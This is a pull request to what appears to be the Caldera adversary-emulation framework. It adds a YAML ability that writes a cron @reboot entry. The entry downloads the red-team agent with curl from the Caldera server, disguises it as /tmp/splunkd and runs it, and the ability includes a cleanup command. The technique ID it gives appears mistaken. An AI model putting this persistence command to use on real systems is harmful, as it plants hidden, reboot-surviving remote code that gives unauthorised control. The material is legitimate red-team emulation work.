### PR TITLE
cronjob persistence ability

### DIFF
--- a/data/abilities/persistence/831d5b9d-7867-4bca-98f5-bc235445614c.yml
+++ b/data/abilities/persistence/831d5b9d-7867-4bca-98f5-bc235445614c.yml
@@ -1,0 +1,38 @@
+- technique_name: 'Scheduled Task/Job: Cron'
+  plugin: ''
+  repeatable: false
+  technique_id: T1503.003
+  singleton: true
+  buckets: []
+  additional_info:
+    cleanup: '[]'
+  tactic: persistence
+  privilege: ''
+  name: Create cronjob for current user
+  requirements: []
+  access: {}
+  executors:
+  - parsers: []
+    timeout: 60
+    language: null
+    payloads: []
+    build_target: null
+    command: if crontab -l &> /dev/null; then (crontab -l; echo '@reboot sleep 180
+      && server="http://#{caldera.server}:8888";curl -s -X POST -H "file:sandcat.go"
+      -H "platform:linux" $server/file/download > /tmp/splunkd;chmod +x /tmp/splunkd;/tmp/./splunkd
+      -server $server -group red -v') | crontab -; else echo '@reboot sleep 180 &&
+      server="http://#{caldera.server}:8888";curl -s -X POST -H "file:sandcat.go"
+      -H "platform:linux" $server/file/download > /tmp/splunkd;chmod +x /tmp/splunkd;/tmp/./splunkd
+      -server $server -group red -v' | crontab -; fi
+    code: null
+    additional_info: {}
+    variations: []
+    name: sh
+    cleanup:
+    - (crontab -l | grep -v '@reboot sleep 180 && server="http://#{caldera.server}:8888"')
+      | crontab - && rm /tmp/splunkd
+    uploads: []
+    platform: linux
+  description: Create a cronjob for the current user
+  delete_payload: true
+  id: 831d5b9d-7867-4bca-98f5-bc235445614c


### PR DESCRIPTION
## Description

Added a new persistence mechanism. Creates a cronjob that downloads and executes the caldera agent after reboot. 

## Type of change

Please delete options that are not relevant.

- [ ] New feature (non-breaking change which adds functionality)

## How Has This Been Tested?

Ran locally on VM. Ability + cleanup worked in Bash + through Caldera.


## Checklist:

- [ ] My code follows the style guidelines of this project
- [ ] I have performed a self-review of my own code
